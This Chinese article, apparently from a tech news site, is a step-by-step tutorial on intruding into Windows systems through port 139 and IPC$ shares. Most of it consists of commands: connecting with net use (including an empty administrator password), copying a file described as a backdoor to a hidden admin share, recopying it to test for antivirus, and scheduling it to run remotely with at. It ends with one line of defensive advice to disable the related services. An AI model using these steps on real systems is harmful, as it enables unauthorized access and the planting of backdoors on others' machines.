浅谈139端口入侵

安全 黑客攻防
IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。

139端口入侵是一个非常基础的入侵方式了,很多企业安全管理员几乎都已经无视了这种入侵方法。但是所谓别在小河沟里翻了船,还是希望企业安全管理员能够全面地注意安全防范,下面就介绍一下139端口入侵方式。

net use \\192.168.0.1\ipc$Content$nbsp;"" /user:administrator

首先,连接的命令是:

net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密码<空格>/user:用户名

假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:

net use \\192.168.1.11\ipc$Content$nbsp;123456 /user:google        如果连接成功,那么系统会提示"命令成功完成"!

空密码是这样的:

如果密码是空的,那就在原先输入密码的地方以""代替。

开始查看权限:

查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的:

copy<>文件绝对路径<>\\IP地址\文件目标路径

比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:

copy c:\a.exe \\192.168.1.11\d$Content$nbsp;

要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制 1 个文件"

小技巧:

再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!

如果系统提示“改写 \\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。

查看目标系统时间,准备使用at任务计划运行程序。

命令格式:

net<空格>time<空格>\\IP地址

例子:

net time \\192.168.1.11

系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。比如系统显示“\\192.168.1.11 的当前时间是 2006/5/10 下午 06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!

使用AT命令为目标系统添加任务计划:

格式:

at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名

例子:

at \\192.168.1.11 18:20 d:\a.exe

139端口入侵虽然基础,但是一旦中招也是有很大的危害,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。

 

【编辑推荐】

  1. 防止SQL注入攻击:网络管理员的前景展望
  2. ScanSafe:近期3波SQL注入攻击100万中国网站
  3. 图文详解网站SQL注入攻击解决全过程
  4. 有效预防SQL注入攻击的六脉神剑
  5. 防止SQL注入攻击:网络管理员的前景展望

     

     
责任编辑:张启峰 来源: 黑基网
相关推荐

2013-07-18 14:11:20

2010-09-25 14:26:21

2019-06-12 09:19:19

2021-02-11 14:36:13

入侵防御系统

2014-09-19 09:25:01

2010-07-20 14:50:05

telnet端口

2009-10-30 10:57:33

2009-12-10 10:32:43

2018-11-09 05:25:40

2019-05-07 10:28:27

2024-07-01 12:26:36

2009-11-07 11:18:57

2010-02-01 12:07:42

2010-02-01 12:01:53

2011-11-21 09:57:47

2012-10-10 11:36:02

2014-04-28 14:06:41

2010-12-21 18:09:48

2011-10-28 16:03:06

2010-02-01 12:05:57

点赞
收藏

51CTO技术栈公众号